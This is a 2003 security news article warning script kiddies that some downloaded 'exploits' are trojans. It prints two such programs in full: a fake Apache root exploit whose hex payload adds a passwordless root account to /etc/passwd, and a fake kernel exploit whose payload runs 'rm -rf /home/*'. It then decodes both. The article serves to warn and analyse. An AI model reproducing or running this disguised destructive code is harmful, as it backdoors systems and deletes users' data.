Rootsecure Homepage
About RootSecure
Lite Edition
User Area
Audio News
Daily Newsletter
Site News Archives
Sources News Archive
SecNews RSS Feeds
SecNews Console
Links:
Videos
Security
Hacking
Wireless
Downloads:
Other
Perl Scripts
Audio Clips
Win32 Tools
Media Archive
PDF Documents
Reports
Hacker Gear
Win' Error Pic's
ASCII Generator
Your IP Address
RootSecure:
Contact
Search
Publicity
Affiliates
Attack Statistics
Syndication
(RSS/XML Feed)
Privacy Policy
Hits: 134,497,432
(Since 06/09/02)
Admin Telnet
HoneyPot Project
|
|
|
|
Reports | Hackers Hack 'Script Kiddies'
{3rd May 2003} |
|
|
Script kiddies, those that typically use existing well known exploits to
gain unauthorized access to computer systems with little regard for the
actual code and how it works, be warned - examine what you execute.
Most people realise, or quickly find out that downloading ‘31337 hax40r
too1z' from sites on free web space is generally not such a good idea
since more likely than not these programmes come with often destructive
extras. Now however those that blindly run code hoping to e.g. deface yet
another supposedly vulnerable web server have another problem to consider,
besides hiding their identity. Does the code they downloaded really do
what it says, or is it a convincing fake which actually adds say a new
root account to the local system with no password.
The practice of producing such ‘exploit' code is certainly not wide
spread, however does happen:
| --- |
/*
Remote apache 2.0.45 root exploit (linux)
Some code taken from a old apache 1.3* expliot, author unknown.
Updated and fixed by WhiteRaven of Hackerhost.com
Due to the nature of the expliot you must be root
on the local box for this to work.
to compile:
gcc apache.c -o apache
*/
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
char shellcode[] = \
"\x65\x63\x68\x6f\x20\x72\x61\x76\x33\x6e\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
#define NOP 0x90
#define BSIZE 256
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000
int main(int argc, char *argv[])
{
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;
if (argc != 2){
printf("Apache 2.0.45 Remote Expliot by WhiteRaven");
printf("%s <target>\n", argv[0]);
exit(1);
}
buffer = (char *)malloc(BSIZE + ASIZE + 100);
if (buffer == NULL) {
printf("Not enough memory! Exiting.\n");
exit(1);
}
memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode, strlen(shellcode));
buffer[BSIZE + ASIZE] = ';';
buffer[BSIZE + ASIZE + 1] = '<!--POST BOX-->';
hp = gethostbyname(argv[1]);
if (hp == NULL) {
printf("No such target server. Exiting.\n");
exit(1);
}
bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(80); /* Port 80 is HTTP */
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Can't open socket, Exiting.\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Connection refused.\nIs the target running a webserver?\nExiting.\n");
exit(1);
}
printf("Sending exploit code...\n");
if (send(s, buffer, strlen(buffer), 0) != 1){
printf("exploit was successful!\n");
}else{
printf("Sorry, This target isn't vulnerable\n");
}
printf("Waiting for shell.....\n");
if (fork() == 0)
execl("/bin/sh", "sh", "-c", shellcode, 0);
else
wait(NULL);
while(1){
/* shell */
}
return 0;
}
|
| --- |
/*
Proof of concept code!!
DO NOT DISTRIBUTE!
d4yj4y_at_yahoo.com
Get r00t on any Linux x86 system
With the below shellcode.
It uses an exploit in the linux
kernel to elevate privilages to root!
*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20" "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61" "\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c" "\x68\x65\x68\x65";
main()
{
system(shellcode);
return 0;
}
|
Anyone running the above code proposing to be a zero day "Remote apache
2.0.45 root exploit" would find an extra root account on their system
under the name rav3n with no password. Decoding the hex characters (65 63
68 6f 20 72 61 76 33 6e 3a 3a 30 3a 30 3a 3a 2f 3a 2f 62 69 6e 2f 73 68 20
3e 3e 20 2f 65 74 63 2f 70 61 73 73 77 64) to ASCII reveals the command
"echo rav3n::0:0::/:/bin/sh >> /etc/passwd" and translating the "Get
r00t on any Linux x86 system" code shows, "/bin/rm -rf /home/*;clear;echo
bl4ckh4t,hehe".
Programs such as these written by ‘hackers' who are increasingly getting
frustrated with those that give them a bad name in the eyes of the media
(by mindlessly attacking machines with the intent of causing damage), reopen
the long running debate on whether systems administrators should have the
right to disable machines attacking their networks. This time however by
proactive, rather than reactive means.
It should be noted the code is written with the hope that legitimate
security professional would not run exploit code written in any language
that they do not have at least a basic understanding in, otherwise the
security profession will find it self coming under even greater attack.
|
|